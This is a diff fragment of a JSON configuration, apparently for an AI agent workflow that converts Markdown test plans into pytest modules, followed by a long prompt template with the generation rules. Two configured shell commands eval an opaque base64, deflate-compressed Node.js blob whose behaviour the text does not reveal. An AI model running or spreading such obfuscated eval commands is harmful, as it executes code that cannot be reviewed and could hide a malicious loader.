"node -e \"eval(require('zlib').inflateRawSync(Buffer.from('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','base64')).toString('utf8'))\""
|
|
201
201
|
],
|
|
202
202
|
"timeoutMs": 60000,
|
|
203
203
|
"cwd": "."
|
|
@@ -398,7 +398,7 @@
|
|
|
398
398
|
"writePolicy": "read-only",
|
|
399
399
|
"shell": {
|
|
400
400
|
"commands": [
|
|
401
|
-
"node -e \"eval(require('zlib').inflateRawSync(Buffer.from('
|
|
401
|
+
"node -e \"eval(require('zlib').inflateRawSync(Buffer.from('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','base64')).toString('utf8'))\""
|
|
402
402
|
],
|
|
403
403
|
"timeoutMs": 60000,
|
|
404
404
|
"cwd": "."
|
|
@@ -450,7 +450,7 @@
|
|
|
450
450
|
"verification-before-completion"
|
|
451
451
|
],
|
|
452
452
|
"complexity": "MED",
|
|
453
|
-
"subtaskPromptTemplate": "Convert the single frozen Markdown module `{{item.markdownPath}}` into one self-contained pytest module. Before writing, also read the run-owned Markdown plan artifact at `{{item.planReadPath}}` and use its explicit API target/environment table as the authoritative fallback base URL for every module. A task/Markdown `API_BASE_URL` target takes precedence over project README dev-server URLs; never infer a backend API fallback from a frontend/Vite port such as localhost:3000. After reading the module Markdown, the run-owned plan artifact, and the bounded pytest config/conftest, immediately use write tools to create the single frozen file `{{item.pytestPath}}`. Define any bounded HTTP client fixture, request logging/redaction/truncation helper and payload builders needed by this module inside that same file; do not import generated testcase/**/helpers/** or testcase/**/factories/** assets. Do not end after analysis or planning. Do not modify Markdown, conftest, helpers/factories, or any other module's pytest script.\n\nOutput budget protocol (hard, max output <=16K per turn): Write exactly the frozen `{{item.pytestPath}}`. Never paste full Python modules into assistant chat. Do not merge or split modules. Do not reduce params/assertions/skips to fit. If OUTPUT_LIMIT_RECOVERY is injected, continue only listed missing/broken scripts.\n\nAlign every variant pytest.param payload with the Markdown scenario intent (empty/missing/null/length/pattern/enum/wrong-type/nominal). Prefer literal payloads over Faker for intent-critical fields so pre-execution scenario-param checks can verify them. Hard contract: intent=enum-invalid MUST pass a concrete invalid value literal (string/number/boolean), never `_OMIT`/None/missing key; intent=missing/empty may use `_OMIT` or delete the key; intent=custom-literal:trim|whitespace-padded requires a leading/trailing whitespace string with non-empty trimmed content (all-whitespace belongs to empty/whitespace-only, not trim); intent=custom-literal:ACTIVE|ARCHIVED requires the exact enum string, never descriptive tokens like filter-active; intent=max/min/max+1 should pass a repeated-string length expression, a bare length number N, or a helper named _*_LEN{N} / _*_MAX_LENGTH / _*_OVER_LENGTH — never a bare 1 for oversize. Hard contract: request payload dicts may only contain DTO field keys from Payload Allowed Paths; never put expect/expected/echo_* helper keys inside the JSON body dict. Path/query/header identifiers and scenario-control metadata (including `id`, expected codes, and selector labels) must stay in separate pytest parameters and helper arguments; never merge them into a DTO patch or JSON body unless that exact path is allowed by the Markdown payload contract. Normalize the configured API base URL with `rstrip(\"/\")` (or equivalently join exactly one slash) before appending endpoint paths; generated requests must never contain a `//api/...` path. When the bound source documents a concrete non-secret local API URL, generated clients must use it as the fallback in `os.environ.get(\"API_BASE_URL\", \"<documented-url>\")`; do not require an otherwise-uninjected environment variable or fail setup solely because it is absent. Missing-field helpers must remove keys idempotently with `payload.pop(field, None)`, never `del payload[field]`, because optional fields may already be absent.\n\nFor every response contract that requires an object or pagination envelope, first assert that each envelope/data value is a dict and that required keys exist, then index fields and assert values. Never let an incidental KeyError or list/string TypeError stand in for the explicit response-shape contract failure.\n\nEnsure every automatable final Markdown Case ID in this module appears in exactly one primary pytest test function or pytest test class method region, using the exact `primary symbol` declared by Markdown. Skip evidence-only meta Cases that declare `脚本/primary symbol=无` with empty variants; do not invent a business pytest symbol for them. The symbol must start with `test_BE_<MODULE>_<NNN>_` so every parameterized collected item remains associated with its Case. Module-level functions and class-based pytest methods are both supported. Only `变体测试点` may use stable `pytest.param(..., id=\"TP-...\")` IDs, and every atomic variant ID must appear exactly once with a genuine input/state/outcome change. A Case with exactly one variant Test Point still needs one literal `pytest.param(..., id=\"TP-...\")` row; never leave a single-variant Case as a bare function with the TP only in the docstring. Use a literal direct `pytest.param(..., id=...)` expression for every row; never hide or wrap it behind `_post_case`, `_put_case`, row-factory functions, comprehensions, generators, or dynamically returned parameter lists; do not use decorator-level `ids=[...]`, generated suffixes, or IDs that extend/shorten the exact Markdown TP. Do not parameterize `场景断言测试点` or `横切证据测试点`; execute all assertion checkpoints within the same business journey/item and use shared helpers for cross-cutting evidence. Governance-only cross-cutting bindings such as writeSet compliance, execution count, report existence, or orchestration state are metadata-only in business pytest: preserve their IDs in `Cross-Cutting-Test-Points`, but never assert `__file__`, filesystem placement, pytest invocation count, Harness state, or report artifacts inside the business test. Harness-owned evidence verifies those bindings. The first statement inside every primary symbol must be a triple-quoted docstring containing exact lines `Case-ID: BE-...`, `Assertion-Test-Points: TP-...;TP-...` and `Cross-Cutting-Test-Points: TP-...;TP-...` (use `none` when empty), for example `def test_BE_X_001():\n \"\"\"\n Case-ID: BE-X-001\n Assertion-Test-Points: TP-X-ASSERT\n Cross-Cutting-Test-Points: none\n \"\"\"`. Module/class docstrings, comments before `def`, and singular `Assertion-Test-Point:` comments never bind a Test Point. Implement request dictionaries so their direct and nested key paths and enum literals exactly satisfy the Case `Payload Required Paths`, `Payload Allowed Paths`, and `Payload Enum`; for `Payload Contract: none`, do not invent a JSON/body DTO. GET/list filters still declare query fields in those payload labels when the Case varies `params=`/`query=` keys. Python `True`/`False` may implement JSON/OpenAPI `true`/`false` query or body booleans. GET/DELETE setup journeys may create resources, but their setup DTO must not change the target operation's no-body payload contract. No Test Point may be invented, renamed, omitted or bound in two modes. The generated pytest collection shape must equal the Markdown prediction `sum(max(1, variant count per Case))`; keep it at or below the task's explicit budget by removing duplicate execution, never by collapsing multiple parameter rows under a coarse family TP. Assertions come only from 预期结果 and setup comes only from 前置条件/测试数据/自动化映射.\n\nName the generated pytest file so it corresponds one-to-one with its source Markdown module file: this module stem `{{item.stem}}` maps to exactly the frozen `{{item.pytestPath}}`. The <module> stem is the Markdown filename without the `.md` extension, lowercased and with non-alphanumeric characters replaced by underscores. For example, `resource_notes` → `testcase/test_resource_notes.py`, `health` → `testcase/test_health.py`. If Markdown automation mapping names a different path than this module stem path, still write the frozen manifest pytest path and do not invent prefixes. Never merge multiple Markdown modules into one pytest file, never split one module across several files, and never invent pytest filenames unrelated to the Markdown modules.\n\nScenario Partition slots: every `TP-<Partition ID>-...` variant Test Point declared by this module's Markdown MUST become exactly one literal direct `pytest.param(..., id=\"TP-<Partition ID>-...\")` row with the exact slot ID; the not-in-set slot passes a concrete literal absent from the documented Domain (e.g. `UNKNOWN_TYPE`) — never `_OMIT`, never a descriptive token. Never split one slot into multiple params or merge several slots under a family TP id. Slot filtering requests hit the documented list endpoint with the slot value as the query/path filter.\n\nKeep this module self-contained: define module-local fixtures and helpers directly in `{{item.pytestPath}}`, so pytest discovers every fixture dependency without external plugin registration. The request log must include method, URL/path, and request parameters (query plus JSON/body/payload summary). The response log must include status code and response result (JSON/text/body 